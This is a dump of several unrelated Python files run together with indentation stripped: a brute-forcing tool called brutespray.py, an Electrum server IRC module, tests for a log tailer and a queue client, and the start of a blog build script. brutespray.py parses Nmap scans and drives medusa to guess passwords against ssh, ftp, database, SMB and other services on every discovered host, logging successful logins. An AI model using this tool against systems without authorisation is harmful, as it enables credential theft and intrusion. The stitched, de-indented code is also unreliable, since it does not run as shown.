██████╔╝██║ ██║╚██████╔╝ ██║ ███████╗███████║██║ ██║ ██║██║ ██║ ██║
╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝
"""+'\n' \
+ '\n brutespray.py v1.6.4' \
+ '\n Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail' \
+ '\n Inspired by: Leon Johnson/@sho-luv' \
+ '\n Credit to Medusa: JoMo-Kun / Foofus Networks <jmk@foofus.net>\n' + colors.normal
#ascii art by: Cara Pearson
class tabCompleter(object):
def pathCompleter(self,text,state):
line = readline.get_line_buffer().split()
return [x for x in glob.glob(text+'*')][state]
def interactive():
t = tabCompleter()
singluser = ""
if args.interactive is True:
print colors.white + "\n\nWelcome to interactive mode!\n\n" + colors.normal
print colors.red + "WARNING:" + colors.white + " Leaving an option blank will leave it empty and refer to default\n\n" + colors.normal
print "Available services to brute-force:"
for serv in services:
srv = serv
for prt in services[serv]:
iplist = services[serv][prt]
port = prt
plist = len(iplist)
print "Service: " + colors.green + str(serv) + colors.normal + " on port " + colors.red + str(port) + colors.normal + " with " + colors.red + str(plist) + colors.normal + " hosts"
args.service = raw_input('\n' + colors.lightblue + 'Enter services you want to brute - default all (ssh,ftp,etc): ' + colors.red)
args.threads = raw_input(colors.lightblue + 'Enter the number of parallel threads (default is 2): ' + colors.red)
args.hosts = raw_input(colors.lightblue + 'Enter the number of parallel hosts to scan per service (default is 1): ' + colors.red)
if args.passlist is None or args.userlist is None:
customword = raw_input(colors.lightblue + 'Would you like to specify a wordlist? (y/n): ' + colors.red)
if customword == "y":
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.pathCompleter)
if args.userlist is None and args.username is None:
args.userlist = raw_input(colors.lightblue + 'Enter a userlist you would like to use: ' + colors.red)
if args.userlist == "":
args.userlist = None
if args.passlist is None and args.password is None:
args.passlist = raw_input(colors.lightblue + 'Enter a passlist you would like to use: ' + colors.red)
if args.passlist == "":
args.passlist = None
if args.username is None or args.password is None:
singluser = raw_input(colors.lightblue + 'Would to specify a single username or password (y/n): ' + colors.red)
if singluser == "y":
if args.username is None and args.userlist is None:
args.username = raw_input(colors.lightblue + 'Enter a username: ' + colors.red)
if args.username == "":
args.username = None
if args.password is None and args.passlist is None:
args.password = raw_input(colors.lightblue + 'Enter a password: ' + colors.red)
if args.password == "":
args.password = None
if args.service == "":
args.service = "all"
if args.threads == "":
args.threads = "2"
if args.hosts == "":
args.hosts = "1"
print colors.normal
NAME_MAP = {"ms-sql-s": "mssql",
"microsoft-ds": "smbnt",
"pcanywheredata": "pcanywhere",
"postgresql": "postgres",
"shell": "rsh",
"exec": "rexec",
"login": "rlogin",
"smtps": "smtp",
"submission": "smtp",
"imaps": "imap",
"pop3s": "pop3",
"iss-realsecure": "vmauthd",
"snmptrap": "snmp"}
def make_dic_gnmap():
global loading
global services
supported = ['ssh','ftp','postgres','telnet','mysql','ms-sql-s','shell',
'vnc','imap','imaps','nntp','pcanywheredata','pop3','pop3s',
'exec','login','microsoft-ds','smtp', 'smtps','submission',
'svn','iss-realsecure','snmptrap','snmp']
port = None
with open(args.file, 'r') as nmap_file:
for line in nmap_file:
for name in supported:
matches = re.compile(r'([0-9][0-9]*)/open/[a-z][a-z]*//' + name)
try:
port = matches.findall(line)[0]
except:
continue
ip = re.findall( r'[0-9]+(?:\.[0-9]+){3}', line)
tmp_ports = matches.findall(line)
for tmp_port in tmp_ports:
name = NAME_MAP.get(name, name)
if name in services:
if tmp_port in services[name]:
services[name][tmp_port] += ip
else:
services[name][tmp_port] = ip
else:
services[name] = {tmp_port:ip}
loading = True
def make_dic_xml():
global loading
global services
supported = ['ssh','ftp','postgresql','telnet','mysql','ms-sql-s','rsh',
'vnc','imap','imaps','nntp','pcanywheredata','pop3','pop3s',
'exec','login','microsoft-ds','smtp','smtps','submission',
'svn','iss-realsecure','snmptrap','snmp']
doc = xml.dom.minidom.parse(args.file)
for host in doc.getElementsByTagName("host"):
try:
address = host.getElementsByTagName("address")[0]
ip = address.getAttribute("addr")
eip = ip.encode("utf8")
iplist = eip.split(',')
except:
# move to the next host
continue
try:
status = host.getElementsByTagName("status")[0]
state = status.getAttribute("state")
except:
state = ""
try:
ports = host.getElementsByTagName("ports")[0]
ports = ports.getElementsByTagName("port")
except:
continue
for port in ports:
pn = port.getAttribute("portid")
state_el = port.getElementsByTagName("state")[0]
state = state_el.getAttribute("state")
if state == "open":
try:
service = port.getElementsByTagName("service")[0]
port_name = service.getAttribute("name")
except:
service = ""
port_name = ""
product_descr = ""
product_ver = ""
product_extra = ""
name = port_name.encode("utf-8")
tmp_port = pn.encode("utf-8")
if name in supported:
name = NAME_MAP.get(name, name)
if name in services:
if tmp_port in services[name]:
services[name][tmp_port] += iplist
else:
services[name][tmp_port] = iplist
else:
services[name] = {tmp_port:iplist}
loading = True
def brute(service,port,fname,output):
if args.userlist is None and args.username is None:
userlist = 'wordlist/'+service+'/user'
uarg = '-U'
elif args.userlist:
userlist = args.userlist
uarg = '-U'
elif args.username:
userlist = args.username
uarg = '-u'
if args.passlist is None and args.password is None:
passlist = 'wordlist/'+service+'/password'
parg = '-P'
elif args.passlist:
passlist = args.passlist
parg = '-P'
elif args.password:
passlist = args.password
parg = '-p'
if args.continuous:
cont = ''
else:
cont = '-F'
if service == "smtp":
aarg = "-m"
auth = "AUTH:LOGIN"
else:
aarg = ''
auth = ''
p = subprocess.Popen(['medusa', '-H', fname, uarg, userlist, parg, passlist, '-M', service, '-t', args.threads, '-n', port, '-T', args.hosts, cont, aarg, auth], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, bufsize=-1)
out = "[" + colors.green + "+" + colors.normal + "] "
output_file = output + '/' + port + '-' + service + '-success.txt'
for line in iter(p.stdout.readline, b''):
print line,
sys.stdout.flush()
time.sleep(0.0001)
if 'SUCCESS' in line:
f = open(output_file, 'a')
f.write(out + line)
f.close()
def animate():
sys.stdout.write('\rStarting to brute, please make sure to use the right amount of ' + colors.green + 'threads(-t)' + colors.normal + ' and ' + colors.green + 'parallel hosts(-T)' + colors.normal + '... \n')
t_end = time.time() + 2
for c in itertools.cycle(['|', '/', '-', '\\']):
if not time.time() < t_end:
break
sys.stdout.write('\rOutput will be written to the folder: ./' + colors.green + args.output + colors.normal + "/ "+ c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\n\nBrute-Forcing... \n')
time.sleep(1)
def loading():
for c in itertools.cycle(['|', '/', '-', '\\']):
if loading == True:
break
sys.stdout.write('\rLoading File: ' + c)
sys.stdout.flush()
time.sleep(0.01)
def parse_args():
parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, description=\
"Usage: python brutespray.py <OPTIONS> \n")
menu_group = parser.add_argument_group(colors.lightblue + 'Menu Options' + colors.normal)
menu_group.add_argument('-f', '--file', help="GNMAP or XML file to parse", required=False, default=None)
menu_group.add_argument('-o', '--output', help="Directory containing successful attempts", default="brutespray-output")
menu_group.add_argument('-s', '--service', help="specify service to attack", default="all")
menu_group.add_argument('-t', '--threads', help="number of medusa threads", default="2")
menu_group.add_argument('-T', '--hosts', help="number of hosts to test concurrently", default="1")
menu_group.add_argument('-U', '--userlist', help="reference a custom username file", default=None)
menu_group.add_argument('-P', '--passlist', help="reference a custom password file", default=None)
menu_group.add_argument('-u', '--username', help="specify a single username", default=None)
menu_group.add_argument('-p', '--password', help="specify a single password", default=None)
menu_group.add_argument('-c', '--continuous', help="keep brute-forcing after success", default=False, action='store_true')
menu_group.add_argument('-i', '--interactive', help="interactive mode", default=False, action='store_true')
menu_group.add_argument('-m', '--modules', help="dump a list of available modules to brute", default=False, action='store_true')
argcomplete.autocomplete(parser)
args = parser.parse_args()
if args.file is None and args.modules is False:
parser.error("argument -f/--file is required")
return args
if __name__ == "__main__":
print(banner)
args = parse_args()
supported = ['ssh','ftp','telnet','vnc','mssql','mysql','postgresql','rsh',
'imap','nntp','pcanywhere','pop3',
'rexec','rlogin','smbnt','smtp',
'svn','vmauthd','snmp']
#temporary directory for ip addresses
if args.modules is True:
print colors.lightblue + "Supported Services:\n" + colors.green
print ('\n'.join(supported))
print colors.normal + "\n"
try:
tmppath = tempfile.mkdtemp(prefix="brutespray-tmp")
except:
sys.stderr.write("\nError while creating brutespray temp directory.")
exit(4)
if not os.path.exists(args.output):
os.mkdir(args.output)
if os.system("command -v medusa > /dev/null") != 0:
sys.stderr.write("Command medusa not found. Please install medusa before using brutespray")
exit(3)
if args.file is None:
sys.exit(0)
if args.passlist and not os.path.isfile(args.passlist):
sys.stderr.write("Passlist given does not exist. Please check your file or path\n")
exit(3)
if args.userlist and not os.path.isfile(args.userlist):
sys.stderr.write("Userlist given does not exist. Please check your file or path\n")
exit(3)
if os.path.isfile(args.file):
try:
t = threading.Thread(target=loading)
t.start()
doc = xml.dom.minidom.parse(args.file)
make_dic_xml()
except:
make_dic_gnmap()
if args.interactive is True:
interactive()
animate()
if services == {}:
print "\nNo brutable services found.\n Please check your Nmap file."
else:
print "\nError loading file, please check your filename."
to_scan = args.service.split(',')
for service in services:
if service in to_scan or to_scan == ['all']:
for port in services[service]:
fname = tmppath + '/' +service + '-' + port
iplist = services[service][port]
f = open(fname, 'w+')
for ip in iplist:
f.write(ip + '\n')
f.close()
brute_process = Process(target=brute, args=(service,port,fname,args.output))
brute_process.start()
#need to wait for all of the processes to run...
#shutil.rmtree(tmppath, ignore_errors=False, onerror=None)
|
ircthread.py
|
#!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import time
import socket
import ssl
import threading
import Queue
import irc.client
from utils import logger
from utils import Hash
from version import VERSION
out_msg = []
class IrcThread(threading.Thread):
def __init__(self, processor, config):
threading.Thread.__init__(self)
self.processor = processor
self.daemon = True
options = dict(config.items('server'))
self.stratum_tcp_port = options.get('stratum_tcp_port')
self.stratum_tcp_ssl_port = options.get('stratum_tcp_ssl_port')
self.report_stratum_tcp_port = options.get('report_stratum_tcp_port')
self.report_stratum_tcp_ssl_port = options.get('report_stratum_tcp_ssl_port')
self.irc_bind_ip = options.get('irc_bind_ip')
self.host = options.get('host')
self.report_host = options.get('report_host')
self.nick = options.get('irc_nick')
if self.report_stratum_tcp_port:
self.stratum_tcp_port = self.report_stratum_tcp_port
if self.report_stratum_tcp_ssl_port:
self.stratum_tcp_ssl_port = self.report_stratum_tcp_ssl_port
if self.report_host:
self.host = self.report_host
if not self.nick:
self.nick = Hash(self.host)[:5].encode("hex")
self.pruning = True
self.pruning_limit = config.get('leveldb', 'pruning_limit')
self.nick = 'A_' + self.nick
self.password = None
self.who_queue = Queue.Queue()
def getname(self):
s = 'v' + VERSION + ' '
if self.pruning:
s += 'p' + self.pruning_limit + ' '
def add_port(letter, number):
DEFAULT_PORTS = {'t':'50001', 's':'50002'}
if not number: return ''
if DEFAULT_PORTS[letter] == number:
return letter + ' '
else:
return letter + number + ' '
s += add_port('t',self.stratum_tcp_port)
s += add_port('s',self.stratum_tcp_ssl_port)
return s
def start(self, queue):
self.queue = queue
threading.Thread.start(self)
def on_connect(self, connection, event):
connection.join("#electrum-arg")
def on_join(self, connection, event):
m = re.match("(A_.*)!", event.source)
if m:
self.who_queue.put((connection, m.group(1)))
def on_quit(self, connection, event):
m = re.match("(A_.*)!", event.source)
if m:
self.queue.put(('quit', [m.group(1)]))
def on_kick(self, connection, event):
m = re.match("(A_.*)", event.arguments[0])
if m:
self.queue.put(('quit', [m.group(1)]))
def on_disconnect(self, connection, event):
logger.error("irc: disconnected")
raise BaseException("disconnected")
def on_who(self, connection, event):
line = str(event.arguments[6]).split()
try:
ip = socket.gethostbyname(line[1])
except:
# no IPv4 address could be resolved. Could be .onion or IPv6.
ip = line[1]
nick = event.arguments[4]
host = line[1]
ports = line[2:]
self.queue.put(('join', [nick, ip, host, ports]))
def on_name(self, connection, event):
for s in event.arguments[2].split():
if s.startswith("A_"):
self.who_queue.put((connection, s))
def who_thread(self):
while not self.processor.shared.stopped():
try:
connection, s = self.who_queue.get(timeout=1)
except Queue.Empty:
continue
#logger.info("who: "+ s)
connection.who(s)
time.sleep(1)
def run(self):
while self.processor.shared.paused():
time.sleep(1)
self.ircname = self.host + ' ' + self.getname()
# avoid UnicodeDecodeError using LenientDecodingLineBuffer
irc.client.ServerConnection.buffer_class = irc.buffer.LenientDecodingLineBuffer
logger.info("joining IRC")
t = threading.Thread(target=self.who_thread)
t.start()
while not self.processor.shared.stopped():
client = irc.client.Reactor()
try:
#bind_address = (self.irc_bind_ip, 0) if self.irc_bind_ip else None
#ssl_factory = irc.connection.Factory(wrapper=ssl.wrap_socket, bind_address=bind_address)
#c = client.server().connect('irc.freenode.net', 6697, self.nick, self.password, ircname=self.ircname, connect_factory=ssl_factory)
c = client.server().connect('irc.freenode.net', 6667, self.nick, self.password, ircname=self.ircname)
except irc.client.ServerConnectionError:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
c.add_global_handler("welcome", self.on_connect)
c.add_global_handler("join", self.on_join)
c.add_global_handler("quit", self.on_quit)
c.add_global_handler("kick", self.on_kick)
c.add_global_handler("whoreply", self.on_who)
c.add_global_handler("namreply", self.on_name)
c.add_global_handler("disconnect", self.on_disconnect)
c.set_keepalive(60)
self.connection = c
try:
client.process_forever()
except BaseException as e:
logger.error('irc', exc_info=True)
time.sleep(10)
continue
logger.info("quitting IRC")
|
test_tailchaser.py
|
import glob
import gzip
import logging
import logging.handlers
import os
import tempfile
import threading
import time
import six
from tailchaser.cli import main
from tailchaser.tailer import Tailer
def cmp_file(src_file, dst_file):
six.print_('testing: ', src_file, dst_file)
assert (Tailer.file_opener(src_file, 'rb').read() == Tailer.file_opener(dst_file, 'rb').read())
def cmp_files(src_path, dst_path, make_name=os.path.basename):
src_files = glob.glob(src_path)
for src_file_path in src_files:
dst_file_path = os.path.join(dst_path, make_name(src_file_path))
cmp_file(src_file_path, dst_file_path)
class Logger(threading.Thread):
def __init__(self):
self.RUNNING = False
super(Logger, self).__init__()
def run(self):
count = 0
self.RUNNING = True
while self.RUNNING:
count += 1
self.emit(count)
def emit(self, count):
six.print_(count)
class RotatingWithDelayFileHandler(logging.handlers.RotatingFileHandler):
ROLL_DELAY = 2
EMIT_DELAY = 1
rolls = 0
ENCODING = None
def doRollover(self):
time.sleep(self.ROLL_DELAY)
self.rolls += 1
six.print_('rolls', self.rolls)
return super(RotatingWithDelayFileHandler, self).doRollover()
def emit(self, record):
time.sleep(self.EMIT_DELAY)
return super(RotatingWithDelayFileHandler, self).emit(record)
@classmethod
def generate(cls, log_file_path, emits, max_bytes=1024, backup_count=100):
count = 0
logger = logging.getLogger(__file__)
handler = cls(log_file_path, maxBytes=max_bytes, backupCount=backup_count, encoding=cls.ENCODING)
formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(name)-12s %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
while count < emits:
count += 1
logger.error("%08d. %s", count, 'x' * 64)
class RotatingGzipFileHandler(RotatingWithDelayFileHandler):
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
time.sleep(self.ROLL_DELAY)
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = "%s.%d.gz" % (self.baseFilename, i)
dfn = "%s.%d.gz" % (self.baseFilename, i + 1)
if os.path.exists(sfn):
# print "%s -> %s" % (sfn, dfn)
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.baseFilename + ".1.gz"
if os.path.exists(dfn):
os.remove(dfn)
with open(self.baseFilename, "rb") as sf:
with gzip.open(dfn, "wb") as df:
df.writelines(sf)
os.remove(self.baseFilename)
# print "%s -> %s" % (self.baseFilename, dfn)
self.mode = 'wb'
self.stream = self._open()
class MultiLineLogHandler(logging.FileHandler):
ROLL_DELAY = 10
EMIT_DELAY = .01
ENCODING = None
@classmethod
def generate(cls, log_file_path, emits):
count = 0
logger = logging.getLogger(__file__)
handler = cls(log_file_path, encoding=cls.ENCODING)
formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(name)-12s %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
while count < emits:
try:
count += 1
if count % 2 == 0:
raise NameError("error %08d" % count)
logger.error("No Exception Thrown: %08d", count)
except NameError:
logger.exception("Exception Thrown: %08d", count)
TEST_PATH = os.path.dirname(os.path.abspath(__file__))
filter_count = 0
def test_filter():
work_dir = tempfile.mkdtemp(prefix='tail-test_filter-tail_from_dir')
six.print_('generating log files', work_dir)
test_file = os.path.join(work_dir, 'test.log')
with open(test_file, 'wb') as file_to_tail:
file_name = file_to_tail.name
six.print_('file to tail with filter', file_to_tail)
for i in range(1000):
if i % 2 == 0:
line = "odd: %d\n" % i
else:
line = "even: %d\n" % i
file_to_tail.write(line)
def consumer_gen():
global filter_count
while True:
record = yield ()
filter_count += 1
consumer = consumer_gen()
consumer.send(None)
vargs = [__name__, '--only-backfill', '--clear-checkpoint', '--filter-re=odd:\\s*\\d+']
vargs.append(test_file)
main(vargs, consumer)
assert (500 == filter_count)
BACKFILL_EMITS = 50
def test_backfill(log_handler=RotatingWithDelayFileHandler, consumer=None, tail_to_dir=None, vargs=None):
tail_from_dir = tempfile.mkdtemp(prefix='tail-test_backfill-tail_from_dir')
six.print_('generating log files', tail_from_dir)
log_handler.generate(os.path.join(tail_from_dir, 'test.log'), BACKFILL_EMITS)
if not tail_to_dir:
tail_to_dir = tempfile.mkdtemp(prefix='tail-test_backfill-tail_to_dir')
if not consumer:
def consumer_gen():
while True:
record = yield ()
open(os.path.join(tail_to_dir, record[1][0]), 'ab').write(record[2])
consumer = consumer_gen()
consumer.send(None)
six.print_('start tailer', tail_to_dir)
source_pattern = os.path.join(tail_from_dir, '*')
if not vargs:
vargs = [__name__, '--only-backfill', '--clear-checkpoint']
vargs.append(source_pattern)
main(vargs, consumer)
cmp_files(source_pattern, tail_to_dir, lambda x: Tailer.make_sig(x))
six.print_('all done', tail_to_dir)
# for src_file_path in glob.glob(source_pattern):
# dst_file_path = os.path.join(tail_to_dir, Tailer.make_sig(src_file_path))
# six.print_("testing:", src_file_path, dst_file_path)
# assert (Tailer.file_opener(src_file_path).read() == Tailer.file_opener(dst_file_path).read())
def test_gzip_backfill():
test_backfill(RotatingGzipFileHandler)
tailed_records = 0
def test_multiline_records():
tail_to_dir = tempfile.mkdtemp(prefix='ml')
def consumer_gen(path):
global tailed_records
while True:
record = yield ()
tailed_records += 1
open(os.path.join(path, record[1][0]), 'ab').write(record[2])
consumer = consumer_gen(tail_to_dir)
consumer.send(None)
start_of_record_re = '\d{4}-\d{2}-\d{2}'
vargs = [__name__, '--only-backfill', '--clear-checkpoint', "--start-of-record-re=%s" % start_of_record_re]
test_backfill(MultiLineLogHandler, consumer, tail_to_dir, vargs=vargs)
six.print_('emimitted %d and tailed %s' % (BACKFILL_EMITS, tailed_records))
assert (BACKFILL_EMITS == tailed_records)
#
#
# test against simple tail
#
def test_tail():
tmp_dir = tempfile.mkdtemp(prefix='tail-test')
log_file_path = os.path.join(tmp_dir, 'file.log')
six.print_(log_file_path)
class SimpleLogger(Logger):
def __init__(self):
self.RUNNING = False
super(SimpleLogger, self).__init__()
def emit(self, count):
open(log_file_path, 'ab').write("%08d. %s\n" % (count, 'x' * 64))
time.sleep(0.1)
loggen_thread = SimpleLogger()
loggen_thread.start()
six.print_('logger started')
copy_dir = tempfile.mkdtemp(prefix='tail-test')
six.print_(copy_dir)
def gx():
while True:
record = yield ()
open(os.path.join(copy_dir, record[1][0]), 'ab').write(record[2])
consumer = gx()
consumer.send(None)
tailer = Tailer(only_backfill=False)
tailer_thread = threading.Thread(target=tailer.run, args=(log_file_path, consumer))
tailer_lag = 30
logger_lag = 60
loggen_thread.join(tailer_lag)
six.print_('logger run more than %d secs, start tailer' % tailer_lag)
tailer_thread.start()
six.print_('tail started')
six.print_('run logger %d secs more' % (logger_lag - tailer_lag))
loggen_thread.join(logger_lag - tailer_lag)
six.print_('stop logger')
loggen_thread.RUNNING = False
if loggen_thread.is_alive():
loggen_thread.join()
log_files = glob.glob(os.path.join(tmp_dir, '*'))
six.print_('logger stopped')
tailer_thread.join(5)
six.print_('wait for tailer to idle')
copy_pattern = os.path.join(copy_dir, '*')
while True:
six.print_('log files %d == files processed %d' % (len(log_files), len(glob.glob(copy_pattern))))
if tailer.state == tailer.WAITING and len(log_files) == len(glob.glob(copy_pattern)):
break
time.sleep(1)
six.print_('stop tailer')
tailer.state = tailer.STOPPED
tailer_thread.join()
six.print_('tailer stopped')
cmp_files(log_file_path, copy_dir, lambda x: str(Tailer.make_sig(x)))
def test_tail_with_break():
tmp_dir = tempfile.mkdtemp(prefix='tail-test')
log_file_path = os.path.join(tmp_dir, 'file.log')
six.print_(log_file_path)
class SimpleLogger(Logger):
def __init__(self):
self.RUNNING = False
super(SimpleLogger, self).__init__()
def emit(self, count):
open(log_file_path, 'ab').write("%08d. %s\n" % (count, 'x' * 64))
time.sleep(0.1)
class BreakingTailer(Tailer):
def __init__(self):
super(BreakingTailer, self).__init__(only_backfill=False)
self.interupt = threading.Event()
def handoff(self, file_tailed, checkpoint, record, receiver=None):
if self.interupt.is_set():
raise SystemExit()
super(BreakingTailer, self).handoff(file_tailed, checkpoint, record, receiver)
loggen_thread = SimpleLogger()
loggen_thread.start()
six.print_('logger started')
copy_dir = tempfile.mkdtemp(prefix='tail-test')
six.print_(copy_dir)
def gx():
while True:
record = yield ()
open(os.path.join(copy_dir, record[1][0]), 'ab').write(record[2])
consumer = gx()
consumer.send(None)
tailer = BreakingTailer()
tailer_thread = threading.Thread(target=tailer.run, args=(log_file_path, consumer))
tailer_lag = 40
logger_lag = 80
loggen_thread.join(tailer_lag)
six.print_('logger run more than %d secs, start tailer' % tailer_lag)
tailer_thread.start()
six.print_('tail started')
six.print_('run logger %d secs more' % (logger_lag - tailer_lag))
loggen_thread.join(logger_lag - tailer_lag - 20)
six.print_('stopping tailer')
tailer.interupt.set()
six.print_('waiting for tailer to stop')
loggen_thread.join(5)
six.print_('tailer stoped - staring again')
tailer = BreakingTailer()
tailer_thread = threading.Thread(target=tailer.run, args=(log_file_path, consumer))
tailer_thread.start()
loggen_thread.join(logger_lag - tailer_lag)
loggen_thread.RUNNING = False
if loggen_thread.is_alive():
loggen_thread.join()
six.print_('logger stopped')
tailer_thread.join(10)
six.print_('wait for tailer to idle')
log_files = glob.glob(os.path.join(tmp_dir, '*'))
copy_pattern = os.path.join(copy_dir, '*')
while True:
six.print_('log files %d == files processed %d' % (len(log_files), len(glob.glob(copy_pattern))))
if tailer.state == tailer.WAITING and len(log_files) == len(glob.glob(copy_pattern)):
break
time.sleep(1)
six.print_('stop tailer')
tailer.state = tailer.STOPPED
tailer_thread.join()
six.print_('tailer stopped')
cmp_files(log_file_path, copy_dir, lambda x: str(Tailer.make_sig(x)))
#
#
# test file drop senario
#
def test_file_drop():
drop_file_name = 'drop_file.txt'
src_file = os.path.join(tempfile.mkdtemp(prefix='test_file_drop-src'), drop_file_name)
dst_file = os.path.join(tempfile.mkdtemp(prefix='test_file_drop-dst'), drop_file_name)
def tail_writer():
while True:
file_name, checkpoint, record = yield ()
open(dst_file, 'ab').write(record)
consumer = tail_writer()
consumer.send(None)
tailer = Tailer()
six.print_("start watch for drop file:", src_file)
six.print_("will save to:", dst_file)
tailer_thread = threading.Thread(target=tailer.run, args=(src_file, consumer))
tailer_thread.start()
tailer_thread.join(10)
def file_drop(num_lines=250):
with open(src_file, 'wb') as dump:
for count in range(num_lines):
dump.write("%08d. %s\n" % (count + 1, 'x' * 64))
dump_thread = threading.Thread(target=file_drop)
dump_thread.start()
dump_thread.join()
six.print_('file dropped')
tailer_thread.join(10)
while True:
six.print_('checking for drop file ingest')
if tailer.state == tailer.WAITING and os.path.exists(dst_file):
break
time.sleep(1)
six.print_('pickup complete')
six.print_('stop tailer')
tailer.state = tailer.STOPPED
tailer_thread.join()
six.print_('tailer stopped')
assert (open(src_file, 'rb').read() == open(dst_file, 'rb').read())
cmp_files(src_file, dst_file, lambda x: x)
#
#
# test against rotating log
#
def test_rotating_log():
tmp_dir = tempfile.mkdtemp(prefix='tail-test')
log_file_path = os.path.join(tmp_dir, 'file.log')
six.print_(log_file_path)
class FastRotate(RotatingWithDelayFileHandler):
EMIT_DELAY = 0.3
ROLL_DELAY = 4
class RotatingLogger(Logger):
def __init__(self):
self.RUNNING = False
self.logger = logging.getLogger(__file__)
handler = FastRotate(log_file_path, maxBytes=2048,
backupCount=100)
self.logger.addHandler(handler)
super(RotatingLogger, self).__init__()
def emit(self, count):
self.logger.error("%08d. %s", count, 'x' * 256)
loggen_thread = RotatingLogger()
loggen_thread.start()
six.print_('logger started')
copy_dir = tempfile.mkdtemp(prefix='tail-test')
six.print_(copy_dir)
def gx():
while True:
record = yield ()
open(os.path.join(copy_dir, record[1][0]), 'ab').write(record[2])
consumer = gx()
consumer.send(None)
tailer = Tailer(only_backfill=False, read_pause=2)
tailer_thread = threading.Thread(target=tailer.run, args=(os.path.join(tmp_dir, '*'), consumer))
tailer_lag = 20
logger_run = 40
loggen_thread.join(tailer_lag)
six.print_('logger run more than %d secs, start tailer' % tailer_lag)
tailer_thread.start()
six.print_('tail started')
six.print_('run logger %d secs more' % (logger_run - tailer_lag))
loggen_thread.join(logger_run - tailer_lag)
six.print_('stop logger')
loggen_thread.RUNNING = False
if loggen_thread.is_alive():
loggen_thread.join()
log_files = glob.glob(os.path.join(tmp_dir, '*'))
six.print_('logger stopped')
tailer_thread.join(5)
six.print_('wait for tailer to idle')
copy_pattern = os.path.join(copy_dir, '*')
while True:
six.print_('log files %d == files processed %d --> %s' % (len(log_files), len(glob.glob(copy_pattern)),
tailer.state))
if tailer.state == tailer.WAITING and len(log_files) <= len(glob.glob(copy_pattern)):
break
time.sleep(1)
six.print_('stop tailer')
tailer.state = tailer.STOPPED
tailer_thread.join()
six.print_('tailer stopped')
for src_file_path in log_files:
dst_file_path = os.path.join(copy_dir, str(Tailer.make_sig(src_file_path)))
assert (open(src_file_path).read() == open(dst_file_path).read())
# cmp_files(tmp_dir, copy_dir, lambda x: str(Tailer.make_sig(x)))
if __name__ == '__main__':
test_filter()
|
test_client.py
|
import sys
import unittest
import threading
import multiprocessing
from stiqueue.sqserver import SQServer
from stiqueue.sqclient import SQClient
import os
import time
class ClientTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
time.sleep(1)
host = "127.0.0.1"
port = 1234
if 'sqhost' in os.environ:
host = os.environ['sqhost']
if 'sqport' in os.environ:
port = int(os.environ['sqport'])
cls.host = host
cls.port = port
p = multiprocessing.Process(target=cls.start_server, args=(host, port))
p.start()
cls.server_process = p
time.sleep(1)
cls.client = SQClient(host=cls.host, port=cls.port)
@classmethod
def tearDownClass(cls):
print("closing things down")
cls.client.disconnect()
cls.server_process.terminate()
@classmethod
def start_server(cls, host, port):
s = SQServer(host=host, port=port)
s.listen()
def test_send_and_recv(self):
self.client = ClientTest.client
self.client.enq(b"A")
self.client.enq(b"B")
a = self.client.deq()
b = self.client.deq()
empty = self.client.deq()
self.assertEqual(a, b"A")
self.assertEqual(b, b"B")
self.assertEqual(empty, b'')
|
make.py
|
import argparse
import datetime
import os, shutil
import json
from http.server import HTTPServer, SimpleHTTPRequestHandler
import threading
import re
import subprocess
CONFIG = 'docs/_config'
CONFIG_DATABASE = os.path.join(CONFIG, "db.json")
CONFIG_SITEMAP = os.path.join(CONFIG, "sitemap.xml")
SITE_BASEURL = 'https://wklchris.github.io/blog/'
DOCSRC, DOCDST = 'docsrc', 'docs'
ENCODING = 'utf-8'
def docsrc_prefix_path(*path, docsrc_path="docsrc"):
return os.path.join(docsrc_path, *path)
def docdst_prefix_path(*path, docdst_path="docs"):
return os.path.join(docdst_path, *path)
def write_str_into_file(docstr, *path):
fpath = docsrc_prefix_path(*path)
with open(fpath, 'w', encoding=ENCODING) as f:
f.write(docstr)
def read_from_file(fpath, join=True):
with open(fpath ,'r', encoding=ENCODING) as f:
lines = f.readlines()
return lines if not join else ''.join(lines)
def load_json(fpath):
with open(fpath, 'r', encoding=ENCODING) as f:
data = json.load(f)
return data
def sort_dict(dictdata):
return {k: dictdata[k] for k in sorted(dictdata.keys())}
def create_new_doc(docname, doctitle=None):
"""
Create a new document and init it.
"""
if not doctitle:
doctitle = docname
doc_path = docsrc_prefix_path(docname)
if not os.path.isdir(doc_path):
os.mkdir(doc_path)
init_new_doc(docname, doctitle)
print(f"Document '{docname}' has been initialized under '{doc_path}'.")
else:
print(f"Document folder '{docname}' already exist.")
def init_conf_py(docname, doctitle):
"""
